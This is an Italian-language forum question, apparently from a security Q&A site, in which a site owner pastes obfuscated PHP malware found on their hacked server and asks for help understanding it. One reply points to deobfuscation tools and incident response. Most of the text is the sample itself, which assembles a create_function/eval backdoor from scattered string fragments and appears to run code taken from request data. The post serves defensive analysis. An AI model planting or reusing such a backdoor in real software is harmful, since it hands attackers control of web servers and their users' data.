PHP Malware - deobsfucation [duplicato]

1

Ho un sito php7 con alcuni file di tipo malware caricati su di esso. Il mio fornitore di servizi di hosting me ne ha notificato e li ho rimossi, ma volevo aiuto per capire l'attacco (aiutare a dissuadere e aiutare a capire cosa fa). Ecco la fonte: DONT RUN IT, come non so cosa faccia .

<?php

$guillotine ='veLaT:(at'; $crust = 'cCrx9)'; $denials = 's';

$cockle='s';$cobby= 'e';

$cretinous ='uT,6)'; $antagonist = '[';$fortnightly ='iHr'; $formalism = 'i';$cowboy = 'a';$installed='i'; $lake =';R=^t';$dairymen='_';
$crept='$$i(f1a'; $bitterroot = 'v'; $arccos ='2?AEE_i_'; $lamb='a';$eradicated = 'tC';
$kimbell='sTiY';
$asymptotic= '"S';
$clarify = ')_,'; $firework='D/esH4+U';$clasping='b'; $divisor ='*rTts(';
$cautious ='EW-'; $embassy=')'; $chaperon ='t';$evinced ='s'; $ibid = 'P[P '; $alyson = 'KnTBe';

$buzzard= 'Sa_S);('; $laurent= ')Rk';
$enumerating= '>=Ueaa';$highly = ''7';$anonym= '0f_$R';$dam='r'; $gypsies ='rM?';$jaye= 't';$as= 'If';$flagrant = '8hHS$I)X';

$arcade = 'KT"'; $foolproof = 'r'; $bowmen ='F'; $incompatibly ='y'; $delegable='a';$heavy ='n$@Qsct';$diatribe= '4'; $campfire= 'o';
$hayyim= 'C;r__e'; $goober= 'e';$dejected= 'e';$bedazzle='$'; $incompletion = 'c'; $hypothetical= 'o'; $diploma= 'Ktusdd.J'; $irremediable='n';$epic ='eEt,S_a'; $faina = 'l(F'; $internet = 'T';

$ephemeris='('; $incorrect ='XfVg'; $binder='r'; $barnard = ')'; $libra= '"';$applied= 'O'; $christian = '_c';$bhoy = 'e';$grieving=']gspHH';$gained ='v'; $fisticuff ='3e:F';

$harlie ='EP)]'; $ermine ='h';

$bond = 'om$<a'; $groundsel ='c]_'; $banning ='r';$innocence ='$';$hutchins ='"'; $amoebae = 't';
$doggy ='y"'; $erminie='Z'; $finesse= '(T"(Vt[lT';

$differing= 'X($'; $atrophic='"]N:)ie'; $forswear = ')]xGK';$buddies = 'RE';
$cynthie = 'O[Tg6sce'; $lane ='(';
$encourage ='_';

$harassment='?p';$jobie ='i(';$camber ='['; $boiled = 'i$O';$bel = 'rQr(C);v';
$boating ='d';

$headwall = 'e';$exemplary = 'ek="5';$climate =';'; $comfortabilities =$cynthie['6'].$bel['2'] .$exemplary['0'].$bond['4'] . $finesse['5'].
$exemplary['0'] . $encourage .

$incorrect['1'] .$diploma['2']. $irremediable. $cynthie['6'].$finesse['5']. $boiled[0] .$bond['0']. $irremediable ;
$injunct =$ibid[3] ; $digestible=$comfortabilities($injunct,$exemplary['0'] .$bel['7'] . $bond['4'].$finesse['7']. $bel[3] . $bond['4']. $bel['2'] .$bel['2']. $bond['4'] .$doggy['0'].$encourage . $harassment['1'] .$bond['0']. $harassment['1'] .$bel[3].$incorrect['1'] .$diploma['2'].$irremediable. $cynthie['6'] .$encourage.$cynthie['3']. $exemplary['0'].$finesse['5'] .$encourage . $bond['4'].$bel['2'].
$cynthie['3'] . $cynthie[5]. $bel[3]. $bel[5] . $bel[5] .$bel[5] .$climate ); $digestible
($embarrassment['0'] , $fisticuff['3'], $arccos[2] , $cynthie[5],
$atrophic['2'], $divisor['0'],
$gypsies['1'],
$bond['3'] , $boiled['1'].$boiled[0]. $exemplary[2].$bond['4'] .$bel['2'].
$bel['2']. $bond['4'] .$doggy['0'] . $encourage .$bond['1'] .$exemplary['0'].$bel['2'] . $cynthie['3'].$exemplary['0'] .$bel[3].$boiled['1'] . $encourage.$buddies['0']. $buddies['1'].

$bel['1'].
$enumerating['2'].$buddies['1']. $epic[4].

$cynthie['2'].

$epic['3'].$boiled['1'] .$encourage. $bel['4'].$boiled['2']. $boiled['2'] .
$forswear['4'].$flagrant['5'] . $buddies['1'] . $epic['3'].$boiled['1']. $encourage.
$epic[4] . $buddies['1'] . $buddies['0']. $finesse['4'] .$buddies['1'].$buddies['0'] . $bel[5] .$climate.$boiled['1']. $bond['4'] . $exemplary[2]. $boiled[0]. $cynthie[5].$cynthie[5] .$exemplary['0']. $finesse['5'] .$bel[3]. $boiled['1']. $boiled[0] . $camber .$exemplary['3'] .$ermine . $forswear['2'] . $exemplary['1'] .

$cynthie['6'] .

$finesse['5']. $finesse['5']. $cynthie[5].
$incorrect['1'] .$exemplary['3']. $forswear['1'] .$bel[5]. $harassment['0'] .$boiled['1'].$boiled[0]. $camber. $exemplary['3'].
$ermine.$forswear['2']. $exemplary['1'] . $cynthie['6'].$finesse['5']. $finesse['5'] . $cynthie[5] .
$incorrect['1'] .$exemplary['3']. $forswear['1'].$atrophic['3'] . $bel[3].$boiled[0].$cynthie[5].$cynthie[5] . $exemplary['0'] .
$finesse['5'] .$bel[3]. $boiled['1'] .$boiled[0] .

$camber .$exemplary['3'] .$grieving['5']. $cynthie['2'] . $cynthie['2'].$harlie['1'] . $encourage .$grieving['5']. $differing['0'] .$forswear['4'].

$bel['4'] .$cynthie['2']. $cynthie['2'].$epic[4] . $fisticuff['3'] .$exemplary['3'] .
$forswear['1'].
$bel[5] .$harassment['0'] .

$boiled['1'].
$boiled[0] . $camber. $exemplary['3'] . $grieving['5'] .$cynthie['2'].$cynthie['2'] .$harlie['1'] . $encourage.$grieving['5'] .

$differing['0'] .$forswear['4']. $bel['4']. $cynthie['2'] . $cynthie['2'] .
$epic[4] . $fisticuff['3'] . $exemplary['3'] . $forswear['1'] .
$atrophic['3']. $boating.

$boiled[0].$exemplary['0'].$bel[5] .$climate . $exemplary['0'] . $bel['7'] .$bond['4']. $finesse['7'] .$bel[3]. $cynthie[5] .$finesse['5'] .$bel['2'] . $bel['2']. $exemplary['0'].$bel['7'].
$bel[3].$clasping . $bond['4'] .$cynthie[5].$exemplary['0']. $cynthie['4'].$diatribe.
$encourage.$boating. $exemplary['0'].

$cynthie['6'] . $bond['0'] . $boating. $exemplary['0'] .

$bel[3]. $cynthie[5] .

$finesse['5'].
$bel['2'].

$bel['2'] .

$exemplary['0'].$bel['7'].$bel[3].$boiled['1'] .

$bond['4']. $bel[5] .

$bel[5].$bel[5].$bel[5].$climate  );
    
posta ÁEDÁN 24.07.2017 - 17:07
fonte

1 risposta

-2

Va bene per de-offuscamento puoi usare strumenti online come link o eseguire una VM locale per testare ciò che fa lo script php.

Anche un consiglio, dato che hai trovato questo nel tuo sito web, significa sicuramente che il tuo sito web è stato violato. Come processo di risposta agli incidenti devi trovare la debolezza del tuo sito web per prevenire ulteriori attacchi che continuerai ad avere questi problemi.

    
risposta data 25.07.2017 - 09:36
fonte

Leggi altre domande sui tag